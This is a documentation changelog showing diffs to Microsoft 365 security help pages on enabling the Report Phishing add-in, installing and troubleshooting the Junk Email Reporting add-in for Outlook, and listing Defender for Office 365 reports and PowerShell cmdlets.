->If you already have an existing Office 365 or Azure Active Directory subscription, you can skip the Office 365 E5 trial or pilot tenant creation steps.
-
-In this phase, you'll be guided to:
-- Create an Office 365 E5 trial tenant-- Enable Microsoft 365 trial subscription-
+This topic guides you to set up a dedicated lab environment. For information on setting up a trial in production, see the new [Evaluate and pilot Microsoft 365 Defender](eval-overview.md) guide.
## Create an Office 365 E5 trial tenant >[!NOTE]
security Enable The Report Phish Add In https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/enable-the-report-phish-add-in.md
- Title: "Enable the Report Phish add-in"-- NOCSH-----
-localization_priority: Normal
-- MET150-- MOE150--- M365-security-compliance
-description: "Learn how to enable the Report Phishing add-in for Outlook and Outlook on the web, for individual users or your entire organization."
--
-# Enable the Report Phishing add-in
---
-> [!NOTE]
-> If you're an admin in a Microsoft 365 organization with Exchange Online mailboxes, we recommend that you use the Submissions portal in the Microsoft 365 Defender portal. For more information, see [Use Admin Submission to submit suspected spam, phish, URLs, and files to Microsoft](admin-submission.md).
-
-The Report Message and Report Phishing add-ins for Outlook and Outlook on the web (formerly known as Outlook Web App) enable people to easily report false positives (good email marked as bad) or false negatives (bad email allowed) to Microsoft and its affiliates for analysis.
-
-Microsoft uses these submissions to improve the effectiveness of email protection technologies. For example, suppose that people are reporting many messages using the Report Phishing add-in. This information surfaces in the [Security Dashboard](security-dashboard.md) and other reports. Your organization's security team can use this information as an indication that anti-phishing policies might need to be updated.
-
-You can install either the Report Message or Report Phishing add-in. If you want your users to report both spam and phishing messages, deploy the Report Message add-in in your organization. For more information, see [Enable the Report Message add-in](enable-the-report-message-add-in.md).
-
-The Report Phishing add-in provides the option to report only phishing messages. Admins can enable the Report Phishing add-in for the organization, and individual users can install it for themselves.
-
-If you're an individual user, you can [enable the Report Phishing add-in for yourself](#get-the-report-phishing-add-in-for-yourself).
-
-If you're a global administrator or an Exchange Online administrator, and Exchange is configured to use OAuth authentication, you can [enable the Report Phishing add-in for your organization](#get-and-enable-the-report-phishing-add-in-for-your-organization). The Report Phishing Add-In is now available through [Centralized Deployment](../../admin/manage/centralized-deployment-of-add-ins.md).
-
-## What do you need to know before you begin?
--- The Report Phishing add-in works with most Microsoft 365 subscriptions and the following products:-
- - Outlook on the web
- - Outlook 2013 SP1 or later
- - Outlook 2016 for Mac or later
- - Outlook included with Microsoft 365 apps for Enterprise
- - Outlook app for iOS and Android
--- The Report Phishing add-in is not available for shared mailboxes or mailboxes in on-premises Exchange organizations.--- You can configure reported messages to be copied or redirected to a mailbox that you specify. For more information, see [User submissions policies](user-submission.md).--- Your existing web browser should work with the Report Phishing add-in. But, if you notice the add-in is not available or not working as expected, try a different browser.--- For organizational installs, the organization needs to be configured to use OAuth authentication. For more information, see [Determine if Centralized Deployment of add-ins works for your organization](../../admin/manage/centralized-deployment-of-add-ins.md).--- Admins need to be a member of the Global admins role group. For more information, see [Permissions in the Microsoft 365 Defender portal](permissions-microsoft-365-security-center.md).-
-## Get the Report Phishing add-in for yourself
-
-1. Go to the Microsoft AppSource at <https://appsource.microsoft.com/marketplace/apps> and search for the Report Phishing add-in.
-
-2. Click **GET IT NOW**.
-
-3. In the dialog that appears, review the terms of use and privacy policy, and then click **Continue**.
-
-4. Sign in using your work or school account (for business use) or your Microsoft account (for personal use).
-
-After the add-in is installed and enabled, you'll see the following icons:
--- In Outlook, the icon looks like this:-
- ![Report Phishing add-in icon for Outlook](../../media/Outlook-ReportPhishing.png)
--- In Outlook on the web, the icon looks like this:-
- ![Outlook on the web Report Phishing add-in icon](../../media/OWA-ReportPhishing.png)
-
-## Get and enable the Report Phishing add-in for your organization
-
-> [!NOTE]
-> It could take up to 12 hours for the add-in to appear in your organization.
-
-1. In the Microsoft 365 admin center, go to the go to the **Settings** \> **Add-ins** page at <https://admin.microsoft.com/AdminPortal/Home#/Settings/AddIns>, If you don't see the **Add-in** Page, go to the **Settings** \> **Integrated apps** \> **Add-ins** link on the top of the **Integrated apps** page.
-
-2. Select **Deploy Add-in** at the top of the page, and then select **Next**.
-
- ![Services and add-ins page in the Microsoft 365 admin center](../../media/ServicesAddInsPageNewM365AdminCenter.png)
-
-3. In the **Deploy a new add-in** flyout that appears, review the information, and then click **Next**.
-
-4. On the next page, click **Choose from the Store**.
-
- ![Deploy a new add-in page](../../media/NewAddInScreen2.png)
-
-5. In the **Select add-in** page that appears, click in the **Search** box, enter **Report Phishing**, and then click **Search** ![Search icon](../../media/search-icon.png). In the list of results, find **Report Phishing** and then click **Add**.
-
-6. In the dialog that appears, review the licensing and privacy information, and then click **Continue**.
-
-7. In the **Configure add-in** page that appears, configure the following settings:
-
- - **Assigned users**: Select one of the following values:
-
- - **Everyone** (default)
- - **Specific users / groups**
- - **Just me**
-
- - **Deployment method**: Select one of the following values:
-
- - **Fixed (Default)**: The add-in is automatically deployed to the specified users and they can't remove it.
- - **Available**: Users can install the add-in at **Home** \> **Get add-ins** \> **Admin-managed**.
- - **Optional**: The add-in is automatically deployed to the specified users, but they can choose to remove it.
-
- When you're finished, click **Deploy**.
-
-8. In the **Deploy Report Phishing** page that appears, you'll see a progress report followed by a confirmation that the add-in was deployed. After you read the information, click **Next**.
-
-9. On the **Announce add-in** page that appears, review the information, and then click **Close**.
-
-## Learn how to use the Report Phishing add-in
-
-People who have the add-in assigned to them will see the following icons:
--- In Outlook, the icon looks like this:-
- ![Report Phishing add-in icon for Outlook](../../media/Outlook-ReportPhishing.png)
--- In Outlook on the web, the icon looks like this:-
- ![Outlook on the Web Report Phishing Add-in icon](../../media/OWA-ReportPhishing.png)
-
-## Review or edit settings for the Report Phishing add-in
-
-1. In the Microsoft 365 admin center, go to the go to the **Settings** \> **Add-ins** page at <https://admin.microsoft.com/AdminPortal/Home#/Settings/AddIns>, If you don't see the **Add-in** Page, go to the **Settings** \> **Integrated apps** \> **Add-ins** link on the top of the **Integrated apps** page.
-
-2. Find and select the **Report Phishing** add-in.
-
-3. In the **Edit Report Phishing** flyout that appears, review, and edit settings as appropriate for your organization. When you're finished, click **Save**.
-
-## View and review reported messages
-
-To review messages that users report to Microsoft, you have these options:
--- Use the Admin Submissions portal. For more information, see [View user submissions to Microsoft](admin-submission.md#view-user-submissions-to-microsoft).--- Create a mail flow rule (also known as a transport rule) to send copies of reported messages. For instructions, see [Use mail flow rules to see what users are reporting to Microsoft](/exchange/security-and-compliance/mail-flow-rules/use-rules-to-see-what-users-are-reporting-to-microsoft).
security Junk Email Reporting Add In For Microsoft Outlook https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/junk-email-reporting-add-in-for-microsoft-outlook.md
- Title: Install and use the Junk Email Reporting add-in for Microsoft Outlook
- - NOCSH
--- Previously updated : --
-localization_priority: Normal
-
- - M365-security-compliance
-description: Learn how to install and use the Microsoft Junk Email Reporting add-in to report spam, non-spam, and phishing messages to Microsoft.
--
-# Install and use the Junk Email Reporting add-in for Microsoft Outlook
--
-**Applies to**
-- [Exchange Online Protection](exchange-online-protection-overview.md)-- [Microsoft Defender for Office 365 plan 1 and plan 2](defender-for-office-365.md)-- [Microsoft 365 Defender](../defender/microsoft-365-defender.md)-
-> [!NOTE]
-> If you aren't currently using the Junk E-mail Reporting add-in, we recommend the [Report Message add-in](enable-the-report-message-add-in.md) or the [Report Phishing add-in](enable-the-report-phish-add-in.md) instead. For more information, see [Report messages and files to Microsoft](report-junk-email-messages-to-microsoft.md).
-
-The Junk Email Reporting Add-in for Microsoft Outlook allows users to submit false positives (good email marked as spam), false negatives (bad email allowed) and phishing messages to Microsoft. If your organization doesn't use Exchange Online Protection (for example, on-premises Exchange or email services other than Exchange Online), your junk email report submission will not affect your spam filtering.
-
-This topic explains how to install and use the Junk Email Reporting add-in.
-
-## What do you need to know before you begin?
--- To install the Junk Email Reporting add-in, see the [Install the Junk Email Reporting add-in](#install-the-junk-email-reporting-add-in) section later in this article.--- The Junk Email Reporting add-in works with the following versions of Outlook:-
- - Outlook 2013 or later
- - Outlook included with Microsoft 365 Apps for enterprise
--- For more information about reporting messages to Microsoft, see [Report messages and files to Microsoft](report-junk-email-messages-to-microsoft.md).-
-## Use the Junk Email Reporting add-in to report spam and phishing messages
-
-1. For messages in the Inbox or any other email folder except Junk Email, use any of the following methods to report spam and phishing messages:
-
- - Select the message or open the message. In the **Home** or **Message** tab in the ribbon, click **Junk**, and then select **Report as Junk** or **Report as Phishing**.
-
- ![Report junk or phishing email from the ribbon](../../media/junk-email-reporting-ribbon.png)
-
- - Right-click on the message, select **Junk**, and then select **Report as Junk** or **Report as Phishing**.
-
- ![Report junk or phishing email from right-click](../../media/junk-email-reporting-right-click.png)
-
- - Select multiple messages, right-click, and then select **Report as Junk** or **Report as Phishing**.
-
- ![Report multiple junk or phishing email messages from right-click](../../media/junk-email-reporting-right-click-multiple.png)
-
-2. In the dialog that appears, read the information and click **Report**. If you change your mind, click **Don't Report**.
-
- ![Report as junk dialog](../../media/junk-email-reporting-report-as-junk-dialog.png)
-
- ![Report as phishing dialog](../../media/junk-email-reporting-report-as-phishing-dialog.png)
-
-3. The selected messages will be sent to Microsoft for analysis and:
-
- - Moved to the Junk Email folder if it was reported as spam.
- - Deleted if it was reported as phishing.
-
- To confirm that the messages have been submitted, open your **Sent Items** folder to view the submitted messages.
-
-## Use the Junk Email Reporting add-in to report non-spam and phishing messages from the Junk Email folder
-
-1. In the Junk Email folder, use any of the following methods to report spam false positives or phishing messages:
-
- - Select the message or open the message. In the **Home** or **Message** tab in the ribbon, click **Not Junk**, and then select **Report as Not Junk** or **Report as Phishing**.
-
- ![Report not junk or phishing email from the ribbon in the Junk Email folder](../../media/junk-email-reporting-junk-folder-ribbon.png)
-
- - Right-click on the message, click **Junk**, and then select **Report as Not Junk** or **Report as Phishing**.
-
- ![Report not junk or phishing email from right-click in the Junk Email folder](../../media/junk-email-reporting-junk-folder-right-click.png)
-
- - Select multiple messages, right-click, and then select **Report as Not Junk** or **Report as Phishing**.
-
- ![Report multiple not junk or phishing email messages from right-click in the Junk Email folder](../../media/junk-email-reporting-junk-folder-right-click-multiple.png)
-
-2. In the dialog that appears, read the information and click **Report**. If you change your mind, click **Don't Report**.
-
- ![Report as not junk dialog](../../media/junk-email-reporting-report-as-not-junk-dialog.png)
-
- ![Report as phishing dialog](../../media/junk-email-reporting-report-as-phishing-dialog.png)
-
-3. The selected messages will be sent to Microsoft for analysis and:
-
- - Moved to the Junk Email folder if it was reported as spam.
- - Deleted if it was reported as phishing.
-
- To confirm that the messages have been submitted, open your **Sent Items** folder to view the submitted messages.
-
-## Install the Junk Email Reporting add-in
--- You need to have administrator privileges on the computer where you're installing the add-in.--- Go to <https://www.microsoft.com/download/details.aspx?id=18275> and download the appropriate .msi file for your version of Office to a location that's easy to find:-
- - **32-bit**: `Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (32-bit).msi`
- - **64-bit**: `Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (64-bit).msi`
--- For Outlook 2013 or later, the only prerequisite is the Microsoft .NET Framework 2.0. In Windows 10, you don't install the .NET Framework 2.0 from a download.-
-### Install the Junk Email Reporting Add-in using the Setup wizard
-
-1. On your computer, close Outlook.
-
-2. In Windows 10, verify the .NET Framework 2.0 is enabled. For instructions, see [Enable the .NET Framework 3.5 in Control Panel](/dotnet/framework/install/dotnet-35-windows-10#enable-the-net-framework-35-in-control-panel).
-
-3. Locate the .msi file you downloaded and double-click on it.
-
-4. On the **Welcome to Microsoft Junk Email Reporting Add-in Setup** page, click **Next**.
-
-5. Review the license agreement, click **I accept the terms in the License Agreement** if you agree to the terms, and then click **Next**.
-
-6. When the wizard is complete, click **Finish**.
-
-Start Outlook.
-
-Look for the **Junk** button on your Outlook ribbon. You can now report junk email messages to Microsoft by selecting the junk email messages in your Inbox and clicking the **Report Junk** button.
-
-Choose the down arrow next to **Junk** for more options such as **Report as Phishing** if you want to report phishing scam emails to Microsoft. In your junk mail folder, you can also select, **Report not junk** if an email was incorrectly identified as junk mail.
-
-### Install the Junk Email Reporting Add-In using Silent Mode
-
-1. On your computer, close Outlook.
-
-2. In Windows 10, install the .NET Framework 2.0 by running the following command:
-
- ```dos
- DISM /Online /Enable-Feature /FeatureName:NetFx3 /All
- ```
-
-3. To install the add-in without any user interaction, open a Command Prompt and use the following syntax:
-
- ```dos
- msiexec /qn /i "<PathToMSIFile>\<MSIFile>" [MaxMessageSelection=<1-50>] [BccEmailAddress="<EmailAddress1>; <EmailAddress2>"...]
- ```
-
- - `MaxMessageSelection` specifies the maximum number of messages that you can select for a single submission. Valid values are from 1 to 50. The default value is 15.
-
- - `BccEmailAddress` specifies additional Bcc recipients who will receive a copy of all user submissions. The default value is blank (no additional Bcc recipients).
-
- This example installs the 64-bit version of the add-in from the specified path with the default settings.
-
- ```dos
- msiexec /qn /i "C:\Downloads\Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (64-bit).msi"
- ```
-
- This example installs the 32-bit version of the add-in from the specified path with the following additional settings:
-
- - Up to 20 messages can be selected in a single submission.
- - junkreports@contoso.com and hollyd@treyresearch.net receive Bcc copies of all submissions.
-
- ```dos
- msiexec /qn /i "C:\Downloads\Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (32-bit).msi" MaxMessageSelection=20 BccEmailAddress="junkreports@contoso.com; hollyd@treyresearch.net"
- ```
-
-### How do you know this worked?
-
-To verify that you've successfully installed the Junk Email Reporting Add-in, do the any of the following steps in Outlook:
--- Select the message or open the message. In the **Home** or **Message** tab in the ribbon, click **Junk**, and verify that the following options are available:-
- - **Report as Junk**
- - **Report as Phishing**
- - **Junk Reporting Options**
- - **Report Junk Online Help**
-
- ![Report junk or phishing email from the ribbon](../../media/junk-email-reporting-ribbon.png)
--- Right-click on the message, select **Junk**, and verify that the following options are available:-
- - **Report as Junk**
- - **Report as Phishing**
- - **Junk Reporting Options**
- - **Report Junk Online Help**
-
- ![Report junk or phishing email from right-click](../../media/junk-email-reporting-right-click.png)
--- Select multiple messages, right click, and verify that the following options are available:-
- - **Report as Junk**
- - **Report as Phishing**
-
- ![Report multiple junk or phishing email messages from right-click](../../media/junk-email-reporting-right-click-multiple.png)
--- Do the previous actions in the **Junk Email** folder and verify the previous **Junk** reporting options are now **Not Junk**.-
- ![Report not junk or phishing email from the ribbon in the Junk Email folder](../../media/junk-email-reporting-junk-folder-ribbon.png)
-
- ![Report not junk or phishing email from right-click in the Junk Email folder](../../media/junk-email-reporting-junk-folder-right-click.png)
-
- ![Report multiple not junk or phishing email messages from right-click in the Junk Email folder](../../media/junk-email-reporting-junk-folder-right-click-multiple.png)
-
-## Uninstall the Junk Email Reporting Add-in
-
-After you close Outlook, use any of the following procedures to uninstall the Junk Email Reporting Add-in:
--- **Control Panel**: Press the Windows key + R. In the **Run** dialog that opens, enter `control appwiz.cpl` and then click **OK**.-
- Find and select **Microsoft Junk Email Reporting Add-in** in the list, and then click **Uninstall**.
--- **Windows Installer package**: Find or download the appropriate .msi file, and double-click on it.-
- - **32-bit**: `Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (32-bit).msi`
-
- - **64-bit**: `Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (64-bit).msi`
-
- In the dialog that appears, select **Remove Microsoft Junk Email Reporting Add-in for Outlook** and then click **Next**.
--- **Silent Mode**: Find or download the appropriate .msi file. In a Command Prompt window, replace \<PathToFile\> with the location of the .msi file, and run one of the following commands:-
- - **32-bit**:
-
- ```dos
- msiexec /x "<PathToFile>\Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (32-bit).msi" /qn MSIRESTARTMANAGERCONTROL="DisableShutdown"
- ```
-
- - **64-bit**:
-
- ```dos
- msiexec /x "<PathToFile>\Junk Reporting Add-in for Office 2007, 2010, 2013, and 2016 (64-bit).msi" /qn MSIRESTARTMANAGERCONTROL="DisableShutdown"
- ```
-
-When you open Outlook after the uninstall, the junk, not junk, and phishing reporting options should be gone.
-
-## Troubleshooting the Junk Email Reporting add-in
-
-Occasionally, you might experience trouble with Outlook after adding the Junk Email Reporting Add-In. This section describes problems that you might encounter, along with tips for resolving these issues.
-
-### Troubleshooting for users
-
-You experience one or more of the following problems:
--- Nothing happens when you click **Report Junk**-- Outlook stops responding after you select an email message-- Reported junk mail cannot be delivered due to an "undeliverable" reply-
-To fix this problem, do the following steps:
-
-1. Close and restart Outlook.
-2. Create and send a test message, and verify that the recipient received the message.
-3. If the problem persists, contact your admin.
-
-For other methods that you can use to submit messages to Microsoft, see [Report messages and files to Microsoft](report-junk-email-messages-to-microsoft.md).
-
-### Troubleshooting for admins
-
-#### Problem: An error message continually appears that asks users to contact their system administrator
-
-1. Verify or set the `LoggingLevel` registry key to the value "Verbose":
-
- - **32-bit Outlook on 32-bit Windows**:
-
- ```text
- Windows Registry Editor Version 5.00
-
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Junk Email Reporting\Addins]
- "LoggingLevel"="Verbose"
- ```
-
- - **32-bit Outlook on 64-bit Windows**:
-
- ```text
- Windows Registry Editor Version 5.00
-
- [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Junk Email Reporting\Addins]
- "LoggingLevel"="Verbose"
- ```
-
- - **64-bit Outlook**:
-
- ```text
- Windows Registry Editor Version 5.00
-
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Junk E-mail Reporting\Addins]
- "LoggingLevel"="Verbose"
- ```
-
-2. Restart Outlook and ask users to report back when they see the error message.
-
-3. Collect the log information found at the following location:
-
- `%LOCALAPPDATA%\Microsoft\Junk Email Reporting Add-in\SpamReporterAddinLog.txt`
-
-4. Contact Exchange Online Protection Technical Support and provide them with the log information.
-
-#### Problem: Users selected not to receive a confirmation prompt when they report messages, and now they want the prompt back
-
-1. Create the `ConfirmReportJunk`registry key with the value "True":
-
- ```text
- Windows Registry Editor Version 5.00
-
- HKEY_CURRENT_USER\Software\Microsoft\Junk E-mail Reporting\Preferences]
- "ConfirmReportJunk"="True"
- ```
-
-2. Restart Outlook.
security View Reports For Mdo https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/view-reports-for-mdo.md
In addition to the reports described in this article, several other reports are
|Report|Topic| ||| |**Explorer** (Microsoft Defender for Office 365 Plan 2) or **real-time detections** (Microsoft Defender for Office 365 Plan 1)|[Threat Explorer (and real-time detections)](threat-explorer.md)|
-|**Email security reports**, such as the Top senders and recipients report, the Spoof mail report, and the Spam detections report.|[View email security reports in the Microsoft 365 Defender portal](view-email-security-reports.md)|
-|**Mail flow reports**, such as the Forwarding report, the Mailflow status report, and the Top senders and recipients report.|[Mail flow reports in the new Exchange admin center](/exchange/monitoring/mail-flow-reports/mail-flow-reports)|
-|**URL trace for Safe Links** (PowerShell only). The output of this cmdlet shows you the results of Safe Links actions over the past seven days.|[Get-UrlTrace](/powershell/module/exchange/get-urltrace)|
-|**Mail traffic results for EOP and Microsoft Defender for Office 365** (PowerShell only). The output of this cmdlet contains information about Domain, Date, Event Type, Direction, Action, and Message Count.|[Get-MailTrafficATPReport](/powershell/module/exchange/get-mailtrafficatpreport)|
-|**Mail detail reports for EOP and Defender for Office 365 detections** (PowerShell only). The output of this cmdlet contains details about malicious files or URLs, phishing attempts, impersonation, and other potential threats in email or files.|[Get-MailDetailATPReport](/powershell/module/exchange/get-maildetailatpreport)|
+|Email security reports that don't require Defender for Office 365|[View email security reports in the Microsoft 365 Defender portal](view-email-security-reports.md)|
+|Mail flow reports in the Exchange admin center (EAC)|[Mail flow reports in the new Exchange admin center](/exchange/monitoring/mail-flow-reports/mail-flow-reports)|
+|
+
+PowerShell reporting cmdlets:
+
+<br>
+
+****
+
+|Report|Topic|
+|||
+|Top senders and recipients|[Get-MailTrafficTopReport](/powershell/module/exchange/get-mailtraffictopreport) <p> [Get-MailTrafficSummaryReport](/powershell/module/exchange/get-mailtrafficsummaryreport)|
+|Top malware|[Get-MailTrafficSummaryReport](/powershell/module/exchange/get-mailtrafficsummaryreport)|
+|Mail traffic|[Get-MailTrafficATPReport](/powershell/module/exchange/get-mailtrafficatpreport) <p> [Get-MailDetailATPReport](/powershell/module/exchange/get-maildetailatpreport)|
+|Safe Links|[Get-SafeLinksAggregateReport](/powershell/module/exchange/get-safelinksaggregatereport) <p> [Get-SafeLinksDetailReport](/powershell/module/exchange/get-safelinksdetailreport)|
+|Compromised users|[Get-CompromisedUserAggregateReport](/powershell/module/exchange/get-compromiseduseraggregatereport) <p> [Get-CompromisedUserDetailReport](/powershell/module/exchange/get-compromiseduserdetailreport)|
+|Mail flow status|[Get-MailflowStatusReport](/powershell/module/exchange/get-mailflowstatusreport)|
| ## What permissions are needed to view the Defender for Office 365 reports?